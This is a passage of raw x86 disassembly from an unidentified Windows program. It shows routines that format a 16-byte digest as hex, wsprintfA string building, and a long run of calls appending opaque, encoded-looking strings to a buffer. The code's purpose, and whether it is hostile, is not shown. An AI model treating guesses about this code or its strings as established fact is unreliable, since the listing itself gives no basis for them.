shr eax, 18h
mov [ebp+var_1], al
pop eax
shr edx, 10h
shr ecx, 10h
cmp edi, eax
mov [ebp+var_6], dl
mov [ebp+var_2], cl
jb short loc_415383
push 78h
pop eax
loc_415383: ; CODE XREF: sub_415327+57�j
sub eax, edi
mov ecx, esi
push eax
push offset dword_442B50
call sub_415294
lea eax, [ebp+var_8]
push 8
push eax
mov ecx, esi
call sub_415294
mov eax, [ebp+arg_0]
mov cl, [esi+8]
pop edi
mov [eax], cl
mov ecx, [esi+8]
shr ecx, 8
mov [eax+1], cl
mov cl, [esi+0Ah]
mov [eax+2], cl
mov cl, [esi+0Bh]
mov [eax+3], cl
mov cl, [esi+0Ch]
mov [eax+4], cl
mov ecx, [esi+0Ch]
shr ecx, 8
mov [eax+5], cl
mov cl, [esi+0Eh]
mov [eax+6], cl
mov cl, [esi+0Fh]
mov [eax+7], cl
mov cl, [esi+10h]
mov [eax+8], cl
mov ecx, [esi+10h]
shr ecx, 8
mov [eax+9], cl
mov cl, [esi+12h]
mov [eax+0Ah], cl
mov cl, [esi+13h]
mov [eax+0Bh], cl
mov cl, [esi+14h]
mov [eax+0Ch], cl
mov ecx, [esi+14h]
shr ecx, 8
mov [eax+0Dh], cl
mov cl, [esi+16h]
mov [eax+0Eh], cl
mov cl, [esi+17h]
mov [eax+0Fh], cl
pop esi
leave
retn 4
sub_415327 endp
; =============== S U B R O U T I N E =======================================
sub_415413 proc near ; CODE XREF: sub_4154E4+3E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
call sub_4148E3
push [esp+4+arg_0]
call sub_4292D0
pop ecx
push eax
mov ecx, esi
push [esp+8+arg_0]
call sub_415294
push [esp+4+arg_4]
mov ecx, esi
call sub_415327
pop esi
retn 8
sub_415413 endp
; =============== S U B R O U T I N E =======================================
sub_415440 proc near ; CODE XREF: sub_4154E4+46�p
arg_0 = dword ptr 4
push esi
push 1
push 28h
call sub_42B2CA
mov esi, eax
mov eax, [esp+0Ch+arg_0]
movzx ecx, byte ptr [eax+10h]
push ecx
movzx ecx, byte ptr [eax+0Fh]
push ecx
movzx ecx, byte ptr [eax+0Eh]
push ecx
movzx ecx, byte ptr [eax+0Dh]
push ecx
movzx ecx, byte ptr [eax+0Ch]
push ecx
movzx ecx, byte ptr [eax+0Bh]
push ecx
movzx ecx, byte ptr [eax+0Ah]
push ecx
movzx ecx, byte ptr [eax+9]
push ecx
movzx ecx, byte ptr [eax+8]
push ecx
movzx ecx, byte ptr [eax+7]
push ecx
movzx ecx, byte ptr [eax+6]
push ecx
movzx ecx, byte ptr [eax+5]
push ecx
movzx ecx, byte ptr [eax+4]
push ecx
movzx ecx, byte ptr [eax+3]
push ecx
movzx ecx, byte ptr [eax+2]
push ecx
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax]
push ecx
push eax
push offset a02x02x02x02x02 ; "%02x%02x%02x%02x%02x%02x%02x%02x%02x%02"...
push esi
call sub_429A33
add esp, 54h
mov eax, esi
pop esi
retn 4
sub_415440 endp
; =============== S U B R O U T I N E =======================================
sub_4154B8 proc near ; CODE XREF: sub_4148D7+3�p
push esi
mov esi, ecx
push 40h
push 0
lea eax, [esi+18h]
push eax
call sub_429690
push 10h
lea eax, [esi+8]
push 0
push eax
call sub_429690
push 8
push 0
push esi
call sub_429690
add esp, 24h
pop esi
retn
sub_4154B8 endp
; =============== S U B R O U T I N E =======================================
sub_4154E4 proc near ; CODE XREF: sub_40A938+A41�p
; sub_420399+222�p
mov eax, offset loc_436242
call sub_42B6FC
push ecx
push esi
push edi
push 58h
call sub_42B407
pop ecx
mov ecx, eax
mov [ebp-10h], ecx
xor esi, esi
cmp ecx, esi
mov [ebp-4], esi
jz short loc_41550E
call sub_4148D7
mov esi, eax
loc_41550E: ; CODE XREF: sub_4154E4+21�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 11h
call sub_42B407
pop ecx
mov edi, eax
push edi
mov ecx, esi
push dword ptr [ebp+8]
call sub_415413
push edi
mov ecx, esi
call sub_415440
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov large fs:0, ecx
leave
retn
sub_4154E4 endp
; =============== S U B R O U T I N E =======================================
sub_41553D proc near ; CODE XREF: sub_41CD0E+40�p
; sub_41CD84+40�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
jz short loc_415579
mov esi, [esp+4+arg_4]
test esi, esi
jz short loc_415579
cmp byte ptr [eax], 0
jz short loc_415579
cmp byte ptr [esi], 0
jz short loc_415579
push edi
push esi
push eax
call sub_417010
mov edi, eax
push edi
push offset aS_3 ; "+%s"
push esi
call dword_437274 ; wsprintfA
push edi
call sub_429006
add esp, 18h
pop edi
loc_415579: ; CODE XREF: sub_41553D+7�j
; sub_41553D+F�j ...
pop esi
retn
sub_41553D endp
; =============== S U B R O U T I N E =======================================
sub_41557B proc near ; CODE XREF: sub_4155B9+C�p
; sub_4155B9+17�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
test eax, eax
jz short loc_4155B7
mov esi, [esp+4+arg_4]
test esi, esi
jz short loc_4155B7
cmp byte ptr [eax], 0
jz short loc_4155B7
cmp byte ptr [esi], 0
jz short loc_4155B7
push edi
push esi
push eax
call sub_41714C
mov edi, eax
push edi
push offset aS_5 ; "%s"
push esi
call dword_437274 ; wsprintfA
push edi
call sub_429006
add esp, 18h
pop edi
loc_4155B7: ; CODE XREF: sub_41557B+7�j
; sub_41557B+F�j ...
pop esi
retn
sub_41557B endp
; =============== S U B R O U T I N E =======================================
sub_4155B9 proc near ; CODE XREF: sub_418D49+7D�p
push esi
mov esi, offset dword_443E90
push offset dword_445B20
push esi
call sub_41557B
push offset dword_445B30
push esi
call sub_41557B
push offset dword_445B40
push esi
call sub_41557B
push offset a7lybp1gunfm0 ; "7LybP1GuNfm0"
push esi
call sub_41557B
push offset a391myLxl28_ ; "391mY/LxL28."
push esi
call sub_41557B
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push esi
call sub_41557B
push offset aYjmlc1btsf10_0 ; "yJmlc1btsF10"
push esi
call sub_41557B
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push esi
call sub_41557B
add esp, 40h
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push esi
call sub_41557B
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push esi
call sub_41557B
push offset aBwIj0rhpgj1 ; "bw/Ij0rhPgj1"
push esi
call sub_41557B
push offset aFuv1h_fi8sc ; "FuV1H.fi8SC/"
push esi
call sub_41557B
push offset aLcxMHdpwr1 ; "lCX/m/HdpWr1"
push esi
call sub_41557B
push offset aVozbg0sssom1 ; "vozbG0sSsoM1"
push esi
call sub_41557B
push offset aKc4l5_savs3_ ; "KC4L5.sAVS3."
push esi
call sub_41557B
push offset aWk12f0zbpla ; "wK12F0ZBpla/"
push esi
call sub_41557B
add esp, 40h
push offset aSpxmrGVbi0 ; "spxMr/G/vBI0"
push esi
call sub_41557B
push offset a2nru_kpknx ; "/2nRu.KpKNx/"
push esi
call sub_41557B
push offset a7lybp1gunfm0_0 ; "7LybP1GuNfm0"
push esi
call sub_41557B
push offset a391myLxl28__0 ; "391mY/LxL28."
push esi
call sub_41557B
push offset a5h5br_qpSm1_0 ; "5H5BR.qp/sm1"
push esi
call sub_41557B
push offset aYjmlc1btsf10 ; "yJmlc1btsF10"
push esi
call sub_41557B
push offset aZyvgp1mxobt0 ; "zyVGp1MxObt0"
push esi
call sub_41557B
push offset aG7IvGks9l1 ; "g7/IV/gks9L1"
push esi
call sub_41557B
add esp, 40h
push offset aTugnf_mqsdr0 ; "TuGNF.mQSDR0"
push esi
call sub_41557B
push offset aBwIj0rhpgj1_0 ; "bw/Ij0rhPgj1"
push esi
call sub_41557B
push offset aFuv1h_fi8sc_0 ; "FuV1H.fi8SC/"
push esi
call sub_41557B
push offset aLcxMHdpwr1_0 ; "lCX/m/HdpWr1"
push esi
call sub_41557B
push offset aVozbg0sssom1_0 ; "vozbG0sSsoM1"
push esi
call sub_41557B
push offset aKc4l5_savs3__0 ; "KC4L5.sAVS3."
push esi
call sub_41557B
push offset aDJstMfgyq_ ; "d/Jst/MFgyQ."
push esi
call sub_41557B
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
push esi
call sub_41557B
add esp, 40h
push offset a86tb1fspjg0 ; "86tb/1FSpjg0"
push esi
call sub_41557B
push offset aPlsymAee6v1 ; "PlsYM/aEe6v1"
push esi
call sub_41557B
push offset aDehziSaO0 ; "deHZI/SA//o0"
push esi
call sub_41557B
push offset aOb4iqKj5ue_ ; "Ob4iQ/KJ5ue."
push esi
call sub_41557B
push offset aNfknl0nqigy0 ; "NFKNL0nQigY0"
push esi
call sub_41557B
push offset aE0idd0rdw2u ; "e0idD0RDw2U/"
push esi
call sub_41557B
push offset aEuior0ay2w7__0 ; "EUIOR0ay2w7."
push esi
call sub_41557B
push offset aPdazx1odsoh0 ; "PDazX1oDSOh0"
push esi
call sub_41557B
add esp, 40h
push offset aUc6wg1ovwvt1 ; "uc6Wg1OvWVt1"
push esi
call sub_41557B
push offset aDj9owUmrbd_ ; "dJ9OW/uMRBD."
push esi
call sub_41557B
push offset aP00ls0k4t_n1 ; "P00Ls0K4t.N1"
push esi
call sub_41557B
push offset aL3nyw_d7tfl_ ; "l3nYW.D7Tfl."
push esi
call sub_41557B
push offset aQc9zs1zgzff0 ; "Qc9zS1zGZff0"
push esi
call sub_41557B
push offset aWpuwr_6yfru ; "WpuWr.6YFRU/"
push esi
call sub_41557B
push offset a4rmbzFcic21 ; "4RmBz/FCic21"
push esi
call sub_41557B
push offset aSc_coSwlk_ ; "SC.Co/swLK/."
push esi
call sub_41557B
add esp, 40h
push offset aLees11vpbnf0 ; "LeEs11vPbnf0"
push esi
call sub_41557B
push offset aLbjvg0r_qmb_ ; "lbJVg0r.qMb."
push esi
call sub_41557B
push offset aA52n11svyfw0 ; "A52N11SVYFw0"
push esi
call sub_41557B
push offset aHj6vo0jrp9q0 ; "Hj6vo0JRP9Q0"
push esi
call sub_41557B
push offset aR7wrsQhek_0 ; "r7WRs/qHek.0"
push esi
call sub_41557B
push offset aDuzcb0kgssv0 ; "DuzCb0KgSsv0"
push esi
call sub_41557B
push offset aDqjso_47pdb ; "dQJSO.47pdb/"
push esi
call sub_41557B
push offset aK9vUKkutm ; "K9V/U/KkuTM/"
push esi
call sub_41557B
add esp, 40h
push offset a7yfnz0pw11s1 ; "7yfnz0PW11s1"
push esi
call sub_41557B
push offset aNq_as1z1sit ; "nQ.As1Z1SIt/"
push esi
call sub_41557B
push offset aUn3hk0sn58o_0 ; "uN3hk0sn58o/"
push esi
call sub_41557B
push offset aQrn4z10ge1i1_0 ; "QRn4z10ge1I1"
push esi
call sub_41557B
push offset aIegud0v_5_ ; "iEguD0V/.5/."
push esi
call sub_41557B
push offset aFc9kk1jx11g_ ; "fc9Kk1jX11G."
push esi
call sub_41557B
push offset aDnjq8Ze3zw ; "DnjQ8/ze3ZW/"
push esi
call sub_41557B
push offset aEwqxaOc1t_ ; "EWqxA//oC1T."
push esi
call sub_41557B
add esp, 40h
push offset aJiatz0xsump1 ; "JIAtz0xSuMp1"
push esi
call sub_41557B
push offset aVi0qa1mvfro1 ; "VI0QA1mvfro1"
push esi
call sub_41557B
push offset aW3gp6_13acy1 ; "W3GP6.13AcY1"
push esi
call sub_41557B
push offset aE8qiq0hukv9 ; "e8qiq0Hukv9/"
push esi
call sub_41557B
push offset a18rjk_sa2je ; "18Rjk.sa2JE/"
push esi
call sub_41557B
push offset aLjAmKzrtp1 ; "lJ/am/kZRtP1"
push esi
call sub_41557B
push offset aXzaru0amxhi_ ; "XZArU0aMxhi."
push esi
call sub_41557B
push offset aRa7e2Hhxpf0 ; "rA7E2/hHXPf0"
push esi
call sub_41557B
add esp, 40h
push offset aRp4sr11cvr1 ; "Rp4sR11CvR1/"
push esi
call sub_41557B
push offset aZqrvt0t6nmz_ ; "ZqrVt0t6nmZ."
push esi
call sub_41557B
push offset a1shta0bzfwk1 ; "1ShtA0bzFwk1"
push esi
call sub_41557B
push offset aAzcsp_hkilo_ ; "AZcsP.hkiLO."
push esi
call sub_41557B
push offset aFepmfZswfd ; "FEpMF/ZswFD/"
push esi
call sub_41557B
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
push esi
call sub_41557B
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
push esi
call sub_41557B
push offset a43ucs0rkqux_ ; "43uCS0rkQUx."
push esi
call sub_41557B
add esp, 40h
push offset aJc8j0_blhir0 ; "jC8j0.blHIr0"
push esi
call sub_41557B
push offset aPiygc_bgpyh_ ; "PIYGC.BgPyH."
push esi
call sub_41557B
push offset a7bqzu_aqz2u_ ; "7bQzU.aQz2u."
push esi
call sub_41557B
push offset aSar5v0jloic0 ; "saR5v0JloIc0"
push esi
call sub_41557B
push offset aX43mxEgedu_ ; "x43Mx/eGeDu."
push esi
call sub_41557B
push offset aIsopf_pu4ty0 ; "IsoPF.PU4tY0"
push esi
call sub_41557B
push offset a98mu_Nedn7_ ; "98mu./nEdn7."
push esi
call sub_41557B
push offset aVdirq_mjcpx1 ; "vDIrQ.MJcpx1"
push esi
call sub_41557B
add esp, 40h
push offset aSad25HpR91 ; "Sad25/hP/R91"
push esi
call sub_41557B
push offset aVsz2xXqjp5 ; "Vsz2x/xqJP5/"
push esi
call sub_41557B
push offset aPnb_aBfzu60_0 ; "pNb.a/Bfzu60"
push esi
call sub_41557B
push offset aI7atf_8Tag1 ; "i7Atf.8/tag1"
push esi
call sub_41557B
push offset aDo5oa0u5m7_ ; "dO5oA/0U5m7."
push esi
call sub_41557B
push offset aS3dyJzo6r_0 ; "s3dY//JZo6r/"
push esi
call sub_41557B
push offset aKe3l20ufrlq0 ; "kE3L20Ufrlq0"
push esi
call sub_41557B
push offset aVp1weJvqbn_ ; "VP1WE/JVQbn."
push esi
call sub_41557B
add esp, 40h
push offset aUaxwg1w8vsp0qr ; "UaxWg1w8vSP0QRn4z10ge1I1"
push esi
call sub_41557B
push offset aQbwgd0cfxf_ ; "qbwGd0CFxf./"
push esi
call sub_41557B
push offset a2mo7g0_b0qj ; "2mo7G0.B0qj/"
push esi
call sub_41557B
push offset a47ff020f_0_ ; "47Ff/020f.0."
push esi
call sub_41557B
push offset aHyomeIovtv_ ; "HyOMe/iovtV."
push esi
call sub_41557B
push offset aPlsymAee6v1_0 ; "PlsYM/aEe6v1"
push esi
call sub_41557B
push offset aCwxyh0ryouv1 ; "CwXYh0RYoUv1"
push esi
call sub_41557B
push offset aEavyh_ic0dc0 ; "eAvYh.IC0dc0"
push esi
call sub_41557B
add esp, 40h
push offset aUz3rf_vtkug1 ; "uz3rf.VTKug1"
push esi
call sub_41557B
push offset aMaeyv0bdsgj0 ; "MAEyv0BdSGj0"
push esi
call sub_41557B
push offset aI3ncg_v5u4g_ ; "I3nCG.v5U4g."
push esi
call sub_41557B
push offset a9bwj__lz2my0 ; "9bWj..lZ2My0"
push esi
call sub_41557B
push offset aRiocl1kztwo0 ; "rioCl1kzTWO0"
push esi
call sub_41557B
push offset a_swwg1hqeii1 ; ".SWwg1hqeiI1"
push esi
call sub_41557B
push offset aG3obv_r6j7h ; "g3obv.r6j7H/"
push esi
call sub_41557B
push offset aM5spx_qp7lx_ ; "M5sPX.Qp7Lx."
push esi
call sub_41557B
add esp, 40h
push offset aItx_n_wpamx_ ; "ITx.N.WPAmx."
push esi
call sub_41557B
push offset aLndk50vzcqw0 ; "LNdk50vzCqW0"
push esi
call sub_41557B
push offset a9ljbh07crkd_ ; "9lJBH07crkD."
push esi
call sub_41557B
push offset aAjttz06ztse1 ; "ajTtz06Ztse1"
push esi
call sub_41557B
push offset aUn3hk0sn58o ; "uN3hk0sn58o/"
push esi
call sub_41557B
push offset aQrn4z10ge1i1 ; "QRn4z10ge1I1"
push esi
call sub_41557B
push offset aBvuso0ed3mw ; "bVUSO0ed3MW/"
push esi
call sub_41557B
push offset aM1d_716jg1r1 ; "M1d.716Jg1r1"
push esi
call sub_41557B
add esp, 40h
push offset a6x2ka0buubb_ ; "6x2Ka0buUbB."
push esi
call sub_41557B
push offset aUqyil_iyvpi_ ; "uQYiL.iYvpI."
push esi
call sub_41557B
push offset a4qyyh1q2ps1 ; "4QyYH1q/2ps1"
push esi
call sub_41557B
push offset aZgidu12tiv0 ; "ZGidU12tiV0/"
push esi
call sub_41557B
push offset aHgcrw_cwuf5_ ; "HGCRW.CWUF5."
push esi
call sub_41557B
push offset aGztle_nhywf ; "gzTlE.nhywf/"
push esi
call sub_41557B
push offset aTvjro1ubgtg1 ; "TVJrO1uBGtg1"
push esi
call sub_41557B
push offset aL80reUvcue1 ; "l80re/UvCUe1"
push esi
loc_415B67: ; DATA XREF: .text:off_443EF8�o
call sub_41557B
add esp, 40h
push offset aVxa_uCdd7s0 ; "VXA.u/cDD7S0"
push esi
call sub_41557B
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
push esi
call sub_41557B
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
push esi
call sub_41557B
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
push esi
call sub_41557B
push offset a8im6i__c829_ ; "8Im6i..C829."
push esi
call sub_41557B
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
push esi
call sub_41557B
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
push esi
call sub_41557B
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
push esi
call sub_41557B
add esp, 40h
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
push esi
call sub_41557B
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
push esi
call sub_41557B
push offset a_luua_bruje0 ; ".lUua.bruje0"
push esi
call sub_41557B
push offset aKzqshDhric_ ; "kzqSH/dhRIc."
push esi
call sub_41557B
push offset aUycsBekwp0 ; "/uYcs/BEKWP0"
push esi
call sub_41557B
push offset aWwfbf_0ptze_ ; "WWFBf.0ptzE."
push esi
call sub_41557B
push offset aFhzdv1ootfg0 ; "fhzdV1OotFg0"
push esi
call sub_41557B
push offset aUmk7x0pwyw9Qrn ; "Umk7x0PwyW9/QRn4z10ge1I1"
push esi
call sub_41557B
add esp, 40h
push offset aHpmch0pbq800 ; "HPmCH0PbQ800"
push esi
call sub_41557B
push offset aUfbss0cbo8c__0 ; "uFbSS0Cbo8C."
push esi
call sub_41557B
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
push esi
call sub_41557B
push offset a7fugu_n0u2m1 ; "7FUgU.N0U2m1"
push esi
call sub_41557B
push offset aW3dwl46o0u0 ; "w3dWL/46o0u0"
push esi
call sub_41557B
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
push esi
call sub_41557B
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
push esi
call sub_41557B
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
push esi
call sub_41557B
add esp, 40h
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
push esi
call sub_41557B
push offset aDnjyk0fwki__ ; "dnjYk0fWkI.."
push esi
call sub_41557B
push offset aXmz20Gjkq ; "xMz20//gJkQ/"
push esi
call sub_41557B
push offset aNhr6r0qsk450 ; "nHr6r0qsk450"
push esi
call sub_41557B
push offset aX_62c_3ldcp ; "X.62C.3LDCP/"
push esi
call sub_41557B
push offset aWt4rnWgl6v_ ; "wt4Rn/WGL6V."
push esi
call sub_41557B
push offset aImvbw1shwxq0 ; "iMvbW1SHwxQ0"
push esi
call sub_41557B
push offset a4h4m_q_guy_ ; "4h4m/.Q.GUy."
push esi
call sub_41557B
add esp, 40h
push offset aPsern1aagh6_ ; "pSern1AAGh6."
push esi
call sub_41557B
push offset aXkg84_cesgs_ ; "XkG84.cESgs."
push esi
call sub_41557B
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
push esi
call sub_41557B
push offset aP06vqBfbmo_ ; "p06vq/BFBMo."
push esi
call sub_41557B
push offset a3vvsv1vurua ; "3VVsV1VuRUA/"
push esi
call sub_41557B
push offset aW1w2v121jsp_ ; "w1w2V121JSP."
push esi
call sub_41557B
push offset aVz62d1m0yya ; "Vz62d1m0Yya/"
push esi
call sub_41557B
push offset aF4c9z1ubcg80 ; "F4c9z1UBCg80"
push esi
call sub_41557B
add esp, 40h
push offset a2yclo0srxpi ; "2YClO0SRxpi/"
push esi
call sub_41557B
push offset aH3yh9_xq_s2_ ; "h3YH9.Xq.S2."
push esi
call sub_41557B
push offset aIwbkf0o1om6Qrn ; "IwBKf0O1Om6/QRn4z10ge1I1"
push esi
call sub_41557B
push offset aKmdie1uwntq ; "KmdIe1UwntQ/"
push esi
call sub_41557B
push offset aUpx0wCz2ei0qrn ; "UPx0W/cz2EI0QRn4z10ge1I1"
push esi
call sub_41557B
push offset aV6jbh0k4uD_ ; "V6jBH0k4u/d."
push esi
call sub_41557B
push offset aB2smo_whkew_qr ; "B2smo.WHkeW.QRn4z10ge1I1"
push esi
call sub_41557B
push offset aVxg7n_qbmg90aa ; "vXG7N.qBMG90aA/Td0EX07M1"
push esi
call sub_41557B
add esp, 40h
push offset aEm42x_1iszi1 ; "Em42x.1IsZI1"
push esi
call sub_41557B
push offset aErnniHm17t1qrn ; "ERNNi/HM17T1QRn4z10ge1I1"
push esi
call sub_41557B
push offset aQ5l5f_2to_60 ; "q5l5f.2TO.60"
push esi
call sub_41557B
push offset aJbkl4Fbwcf1 ; "jBKL4/FbWCF1"
push esi
call sub_41557B
push offset aW3gp6_13acy1_0 ; "W3GP6.13AcY1"
push esi
call sub_41557B
push offset aM08se_kt9td1 ; "M08SE.Kt9tD1"
push esi
call sub_41557B
push offset a3eowx2ocng ; "3eowX/2OCnG/"
push esi
call sub_41557B
push offset aS3dyJzo6r ; "s3dY//JZo6r/"
push esi
call sub_41557B
add esp, 40h
push offset aUwher1dagd80 ; "UWher1DAGD80"
push esi
call sub_41557B
push offset aPnb_aBfzu60 ; "pNb.a/Bfzu60"
push esi
call sub_41557B
push offset aZu2s6_o7_yt ; "Zu2s6.O7.yt/"
push esi
call sub_41557B
push offset a4hftz6holr ; "4hftZ/6HOlR/"
push esi
call sub_41557B
push offset aYqrdp_9rf4u0 ; "yqrdP.9rF4U0"
push esi
call sub_41557B
push offset a1uyis15kh_n1 ; "1UyIs15KH.n1"
push esi
call sub_41557B
push offset a9ljbh07crkd__0 ; "9lJBH07crkD."
push esi
call sub_41557B
push offset aD0ron_ctdg0_ ; "D0roN.CTDg0."
push esi
call sub_41557B
add esp, 40h
push offset aFr8ri0f9nfz_ ; "fr8ri0f9NfZ."
push esi
call sub_41557B
push offset aWbzcx0Dknt_ ; "wbZcx0/Dknt."
push esi
call sub_41557B
push offset aNyjsr1cv5ch0 ; "NyJsR1cV5CH0"
push esi
call sub_41557B
push offset aI6sd4ctzn0 ; "/I6sD/4CTzn0"
push esi
call sub_41557B
push offset aWrlthN3uh_1 ; "WRlth/n3Uh.1"
push esi
call sub_41557B
push offset aYqjsn0wtutn1 ; "yQJsn0wtUtn1"
push esi
call sub_41557B
push offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
push esi
call sub_41557B
push offset aO_sxv_ze9bk1go ; "O.sxv.ze9bK1GOISY.dO.Vn1"
push esi
call sub_41557B
add esp, 40h
push offset aFfec81uznt81 ; "fFEC81UzNT81"
push esi
call sub_41557B
push offset aJvatg1988z81 ; "jVATg1988z81"
push esi
call sub_41557B
push offset aPrttt0s3ag916n ; "pRTtT0s3aG916N5aw.affEY1"
push esi
call sub_41557B
push offset aHm1h_049e4o ; "Hm1H.049e4O/"
push esi
call sub_41557B
push offset aWj27_1belx20 ; "wj27.1Belx20"
push esi
call sub_41557B
push offset aAl_N0kenp20 ; "Al./N0Kenp20"
push esi
call sub_41557B
push offset a6h4nn1igjm60 ; "6h4NN1IGJm60"
push esi
call sub_41557B
push offset aUr6ne_mot50_ ; "Ur6ne.MOT50."
push esi
call sub_41557B
add esp, 40h
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push esi
call sub_41557B
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push esi
call sub_41557B
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push esi
call sub_41557B
push offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
push esi
call sub_41557B
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
push esi
call sub_41557B
push offset aLtlec18us5q0 ; "LTLec18US5q0"
push esi
call sub_41557B
push offset a6atss0dycwf_6n ; "6atSs0dyCWF.6N5aw.affEY1"
push esi
call sub_41557B
push offset a7_pak0onymn7ra ; "7.PaK0OnymN/7Razv/1FefF."
push esi
call sub_41557B
add esp, 40h
push offset aWhdag1glagf_ ; "WHdAg1glAgf."
push esi
call sub_41557B
push offset aLmecq0ygcok ; "lmecq0yGcoK/"
push esi
call sub_41557B
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push esi
call sub_41557B
push offset aXu6cu1p_sn6_6n ; "XU6CU1p.SN6.6N5aw.affEY1"
push esi
call sub_41557B
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
push esi
call sub_41557B
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push esi
call sub_41557B
push offset aPtami1_agv ; "PTaMI1/.aGV/"
push esi
call sub_41557B
push offset aUhdhc1pcv9i ; "uhdhC1pCV9i/"
push esi
call sub_41557B
add esp, 40h
push offset aWulzr_x7xjb0 ; "WUlZR.X7XjB0"
push esi
call sub_41557B
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push esi
call sub_41557B
push offset aBvygm_afzkh0 ; "BVYGm.aFzkh0"
push esi
call sub_41557B
push offset aLcgg60qk2mf0 ; "Lcgg60QK2mf0"
push esi
call sub_41557B
push offset aYhzck13caog0 ; "YhzCK13CaOG0"
push esi
call sub_41557B
push offset aAxauo_rlggx0 ; "aXauo.rLGgX0"
push esi
call sub_41557B
push offset aXwzwo1pqcgt16n ; "XWzwO1PqcgT16N5aw.affEY1"
push esi
call sub_41557B
push offset aVfeso_qcgdt_ ; "vfEsO.QcgDt."
push esi
call sub_41557B
add esp, 40h
push offset aSsoce0jbtxi ; "sSOce0JbTXI/"
push esi
call sub_41557B
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push esi
call sub_41557B
push offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
push esi
call sub_41557B
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push esi
call sub_41557B
push offset aIhfnL6b5x ; "/iHFN/l6B5X/"
push esi
call sub_41557B
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push esi
call sub_41557B
push offset aBnjcz_zig1m0 ; "bNJcZ.ziG1m0"
push esi
call sub_41557B
push offset aSfe3h0kclgx0 ; "SFe3H0kCLgx0"
push esi
call sub_41557B
add esp, 40h
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
call sub_41557B
push offset aQvdspRbq6w0 ; "QvDsp/rBQ6w0"
push esi
call sub_41557B
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push esi
call sub_41557B
push offset aNd4qzY5xml0rna ; "nD4Qz/y5xMl0RNAQI05pV11/XzinP/s/R0A."
push esi
call sub_41557B
push offset aRy6iq0udbph ; "RY6IQ0UDbPh/"
push esi
call sub_41557B
push offset aW3nki_guvjx ; "w3NKI.gUvJx/"
push esi
call sub_41557B
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push esi
call sub_41557B
push offset aRy6iq0udbphN2n ; "RY6IQ0UDbPh/N2NHs/pc9zb/8Wb3v063Ds00"
push esi
call sub_41557B
add esp, 40h
push offset a8cbgoRjryr_ ; "8CBGO/rJRYr."
push esi
call sub_41557B
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push esi
call sub_41557B
push offset aIde746o6B_ ; "Ide74/6o6/B."
push esi
call sub_41557B
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push esi
call sub_41557B
push offset a7zfry0iusme1 ; "7Zfry0IUSmE1"
push esi
call sub_41557B
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push esi
call sub_41557B
push offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push esi
call sub_41557B
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push esi
call sub_41557B
add esp, 40h
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_41557B
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_41557B
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_41557B
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_41557B
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
push esi
call sub_41557B
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
push esi
call sub_41557B
push offset a2Afm0dt3o6_ ; "2/Afm0dt3o6."
push esi
call sub_41557B
push offset aQvp40nd9f2 ; "/qvP40nD9F2/"
push esi
call sub_41557B
add esp, 40h
push offset aMkk0_mvscp_hwh ; "mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp"...
push esi
call sub_41557B
push offset aShktk1eNl8Jlzt ; "sHKtk1e/Nl8/jLZte1JtI/t1"
push esi
call sub_41557B
